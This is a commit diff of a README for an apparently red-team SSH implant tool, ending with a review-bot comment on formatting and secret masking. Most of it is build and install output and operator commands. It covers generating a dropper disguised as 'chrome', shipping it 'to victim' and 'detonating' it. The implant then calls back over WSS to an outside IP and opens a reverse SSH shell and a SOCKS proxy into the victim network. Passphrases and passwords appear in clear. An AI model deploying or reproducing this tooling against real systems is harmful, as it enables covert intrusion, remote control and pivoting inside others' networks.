dsnezhkov committed Apr 5, 2019
1 parent 22ca8a4 commit 5283aff
Showing 1 changed file with 167 additions and 33 deletions.
200 changes: 167 additions & 33 deletions README.md
@@ -25,45 +25,179 @@ Note: No SCP yet. No DNS proxying yet.

## Deployment

Build Dropper
### Build Dropper and Create Keys

`./build.sh`
`$ ./tools/build.sh ./conf/build.profile `

```bash
[*] Building dropper
[*] Dropper Information (keep it safe):
#######################
Dropper File: rssh (7010788 bytes)
SSH serverHost=192.168.88.15
SSH serverPort=22
SSH serverUser=tester
SSH serverUserKeyUrl=http://127.0.0.1:9000/id_rsa_test_enc
SSH serverUserKeyPassphrase=password1
SSH-RT remoteCmdHost=127.0.0.1
SSH-RT remoteCmdPort=2022
SSH-RT remoteCmdUser=operator
SSH-RT remoteCmdPwd=6009c967f7176e5be0bb14d5b2beb0a8905a069f
SSH-RTS remoteSocksHost=127.0.0.1
SSH-RTS remoteSocksPort=1080
SSH-RT shell agent password: 6009c967f7176e5be0bb14d5b2beb0a8905a069f
#######################

Usage SSH-RT: ssh operator@127.0.0.1 -p 2022
Usage SSH-RTS: browser SOCKS proxy: 127.0.0.1:1080

```
1. Host dropper RSA keys on HTTP server (fetchable by URL from Company Intranet)
2. Allow SSH on C2
3. Ship the binary to victim
```
Cutting Implant ID 4fa48c653682c3b04add14f434a3114 for target (darwin/amd64)
### PHASE I: Implant Generation ###
------------------------------------
[*] Building Keys For 4fa48c653682c3b04add14f434a3114
[+] Generating PK
2019/04/05 00:32:51 Private Key generated
[+] Generating PUB from PK (SSH pub)
2019/04/05 00:32:51 Public key generated
[+] Encoding PK to PEM
[+] Writing PK to file: ./out/4fa48c653682c3b04add14f434a3114/4fa48c653682c3b04add14f434a3114.pk
2019/04/05 00:32:51 Key saved to: ./out/4fa48c653682c3b04add14f434a3114/4fa48c653682c3b04add14f434a3114.pk
[+] Writing PUB to file: ./out/4fa48c653682c3b04add14f434a3114/4fa48c653682c3b04add14f434a3114.pub
2019/04/05 00:32:51 Key saved to: ./out/4fa48c653682c3b04add14f434a3114/4fa48c653682c3b04add14f434a3114.pub
[+] Encrypting PK with passphrase (transmission/storage)
[+] Encoding PK B64 armored PK (transmission)
[+] Saving B64 armored PK to file: ./out/4fa48c653682c3b04add14f434a3114/4fa48c653682c3b04add14f434a3114.bpk
2019/04/05 00:32:51 Key saved to: ./out/4fa48c653682c3b04add14f434a3114/4fa48c653682c3b04add14f434a3114.bpk
[*] Building dropper 4fa48c653682c3b04add14f434a3114 (chrome) for darwin / amd64
**********************************************
Implant: chrome (6942380 bytes) Generated
!!! Here is the info on Implant configuraton !!!
!!! Record the info somewhere safe and we have saved a copy here !!!
!!! Implant Info: /Users/dimas/Code/go/src/sshpipe/out/4fa48c653682c3b04add14f434a3114/4fa48c653682c3b04add14f434a3114.info !!!
!!! This info is mostly embedded in the Implant. !!!
!!! Again, save it, or you will need to regenerate the implant. !!!
**********************************************
```
The build process saves important information on agent properties and context into the file:

```
-------------- START INFO--------------
(Blue) Implant Egress HTTP Proxy Info
+HTTP Proxy:(from env?) yes
HTTP Proxy: http://167.99.88.24:8080
HTTP Proxy AuthUser companyuser
HTTP Proxy AuthPass <masked>
(Blue) Implant Execution Context
Daemonize? no
PIDFile: /tmp/chrome.pid
LogFile (!! Debug locally !!): /tmp/chrome.log
SSHEnvTerm xterm
SSHShell /bin/sh
(Yellow/Red) Implant HTTP/WS/WSS Wrap Endpoints
HTTP Endpoint: http://167.99.88.24:8082
WS Endpoint: wss://167.99.88.24:8082/stream
(Yellow/Red) SSH Rendezvous Point:
SSHServerHost=127.0.0.1
SSHServerPort=222
SSHServerUser=4fa48c653682c3b04add14f434a3114
(Yellow/Red) SSH Key Hosting / Embedding:
+SSHServerUserKeyFile=./out/4fa48c653682c3b04add14f434a3114/4fa48c653682c3b04add14f434a3114.bpk
SSHServerUserKeyUrl=http://127.0.0.1:9000/4fa48c653682c3b04add14f434a3114.bpk
SSHServerUserKeyPassphrase=7acf0d4ea272b24e095d5d74940a658
(Red) RT Operator Interface to SSH Implant Channel:
SSHRemoteCmdHost=127.0.0.1
SSHRemoteCmdPort=2022
(Red) RT Operator SSH Tunnel Usage and Authentication Info
SSHRemoteCmdUser=operator
SSHRemoteCmdPwd=f525a463a8a7fb3a5a11715bec926dd
(Red) RT Operator SOCKS Tunnel Usage Info:
SSHRemoteSocksHost=127.0.0.1
SSHRemoteSocksPort=1080
-------------- END INFO----------------
```

Build script packages key material for infra deployment:
```
[*] Packaging 4fa48c653682c3b04add14f434a3114 for infrastructure deployment
~/Code/go/src/sshpipe/out/4fa48c653682c3b04add14f434a3114 ~/Code/go/src/sshpipe
a ./4fa48c653682c3b04add14f434a3114.pk
a ./4fa48c653682c3b04add14f434a3114.bpk
a ./4fa48c653682c3b04add14f434a3114.pub
~/Code/go/src/sshpipe
```
_Based on your build profile you can expect the following Deployment Plan_

## Install

### Install implant support (manual)
```
### PHASE II: Red Infra Prep Deployment Guidance ###
----------------------------------------------------
A. If you have chosen to fetch armored SSH key from external Yellow/Red hosting, please host ./out/4fa48c653682c3b04add14f434a3114/4fa48c653682c3b04add14f434a3114.bpk on your HTTP server. The key is encrypted, passworded and B64 protected. You can leave it on clear storage and use plaintext transmission. The implant will take care of the rest.
B.You will need to create user 4fa48c653682c3b04add14f434a3114 on SSH server where you want Implant to terminate the reverse tunnel on Red network. Refer to scripts in infra directory. SSH keys for the would be user are pregenerated: ./out/4fa48c653682c3b04add14f434a3114/4fa48c653682c3b04add14f434a3114.pk and ./out/4fa48c653682c3b04add14f434a3114/4fa48c653682c3b04add14f434a3114.pub. You need to place them in .ssh directory as per usual SSH access setup (mind the permissions on keys and .ssh directory)
C. You will need to stand up an WSS unwrap service on Yellow/Red side. Refer to scripts in infra directory or documentation.
```
### Install implant support (automation)

`./install_implant.sh /tmp/4fa48c653682c3b04add14f434a3114.tar.gz`

```
[+] Checking if 4fa48c653682c3b04add14f434a3114 OS account is available
[+] Creating 4fa48c653682c3b04add14f434a3114 OS account
sent invalidate(passwd) request, exiting
sent invalidate(group) request, exiting
sent invalidate(passwd) request, exiting
sent invalidate(group) request, exiting
[+] Setting up 4fa48c653682c3b04add14f434a3114 HOME
[+] Unpacking SSH Keys from 4fa48c653682c3b04add14f434a3114.tar.gz
./4fa48c653682c3b04add14f434a3114.pk
./4fa48c653682c3b04add14f434a3114.bpk
./4fa48c653682c3b04add14f434a3114.pub
[+] Setting 4fa48c653682c3b04add14f434a3114 SSH keys
[+] Adding PUBLIC Key /tmp//4fa48c653682c3b04add14f434a3114/.ssh/4fa48c653682c3b04add14f434a3114 to Agent's Authorized keys file
[+] Currently, content of 4fa48c653682c3b04add14f434a3114 's HOME:
drwx------ 3 4fa48c653682c3b04add14f434a3114 users 4096 Apr 5 05:52 /tmp//4fa48c653682c3b04add14f434a3114
drwx------ 2 4fa48c653682c3b04add14f434a3114 root 4096 Apr 5 05:52 /tmp//4fa48c653682c3b04add14f434a3114/.ssh
-rw------- 1 4fa48c653682c3b04add14f434a3114 staff 4364 Apr 5 04:42 /tmp//4fa48c653682c3b04add14f434a3114/.ssh/4fa48c653682c3b04add14f434a3114.bpk
-rw------- 1 4fa48c653682c3b04add14f434a3114 staff 3243 Apr 5 04:42 /tmp//4fa48c653682c3b04add14f434a3114/.ssh/4fa48c653682c3b04add14f434a3114.pk
-rw------- 1 4fa48c653682c3b04add14f434a3114 staff 725 Apr 5 04:42 /tmp//4fa48c653682c3b04add14f434a3114/.ssh/4fa48c653682c3b04add14f434a3114.pub
-rw-r--r-- 1 root root 725 Apr 5 05:52 /tmp//4fa48c653682c3b04add14f434a3114/.ssh/authorized_keys
/opt/sshorty/tools
[!!!] If not embedding PK into implant, host armored PK: /tmp//4fa48c653682c3b04add14f434a3114/.ssh/4fa48c653682c3b04add14f434a3114.bpk
```
## Detonation

```
### PHASE III: Blue Detonation and Connect back ###
---------------------------------------------------
0. Get the Implant on the Blue system detonate.
1. Implant 4fa48c653682c3b04add14f434a3114 connects to WS Endpoint wss://167.99.88.24:8082/stream
which unwraps to SSH tunnel 127.0.0.1:222 Red rendezvous
2. Implant authenticates to SSH rendezvous with RSA PK in ./out/4fa48c653682c3b04add14f434a3114/4fa48c653682c3b04add14f434a3114.pk wrapped for transmission as ./out/4fa48c653682c3b04add14f434a3114/4fa48c653682c3b04add14f434a3114.bpk as SSH/OS user 4fa48c653682c3b04add14f434a3114
3. Once authenticated the Implant opens up reverse SSH tunnel to Blue network and also stands up two ports on the Red side for convenience:
- SSH command port 2022
- SOCKS 1080 port used for proxying Red traffic over the channel to the implant to exit on Blue network
```
## Operation

```bash
SSH from Attacker C2: ssh operator@127.0.0.1 -p 2022

SOCKS from Attacker C2 SOCKS proxy: 127.0.0.1:1080
point your browser to it and/or proxifier. Note: no DNS masking yet.
```
### PHASE IV: RTO Guidance ###
-----------------------------------------------
RTOs can connect to the new implant channel by connecting to Red rendezvous ports exposed by the implant on Red network.
Examples:
For SSH interactive shell: ssh operator@127.0.0.1 -p 2022
For SSH batch exec: ssh operator@127.0.0.1 -p 2022 /path/command/on/blue
For SCP: scp -P 2022 /path/to/file/on/red operator@127.0.0.1:/path/to/file/on/blue"
Note: To use SOCKS in browser point browser to 127.0.0.1:1080 or for system wide coverage use proxychains with the same configuration
```

## C2:
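Review bot: the code fences in the Operation section are unbalanced: the ```bash block opened before "SSH from Attacker C2" is closed after "Note: no DNS masking yet.", so the "### PHASE IV: RTO Guidance ###" text has no opening fence and the lone ``` after the proxychains note opens a new block that swallows the following "## C2:" section; give PHASE IV its own opening fence or drop the stray closing one. Same region: the SCP example ends with a stray `"` (`...operator@127.0.0.1:/path/to/file/on/blue"`), and "B.You", "an WSS" (PHASE II) and "configuraton" (implant banner) are typos. On secrets in the sample output: the info-file sample masks `HTTP Proxy AuthPass <masked>` but prints `SSHServerUserKeyPassphrase=` and `SSHRemoteCmdPwd=` in full, and the first build example shows `SSH serverUserKeyPassphrase=password1`; mask all of them the same way so the documented layout does not invite copying credentials into a README. The PHASE II claim that the .bpk is "encrypted, passworded and B64 protected" and can sit on clear storage should add the caveat, already implied by "This info is mostly embedded in the Implant", that the hosted key's confidentiality rests on a passphrase recoverable from the implant binary. Finally, the install output creates the account HOME under `/tmp//...` (double slash from the path join, and a /tmp location that is commonly cleared on reboot or by tmp cleaners), so the authorized_keys and key files may not persist; use a permanent home directory.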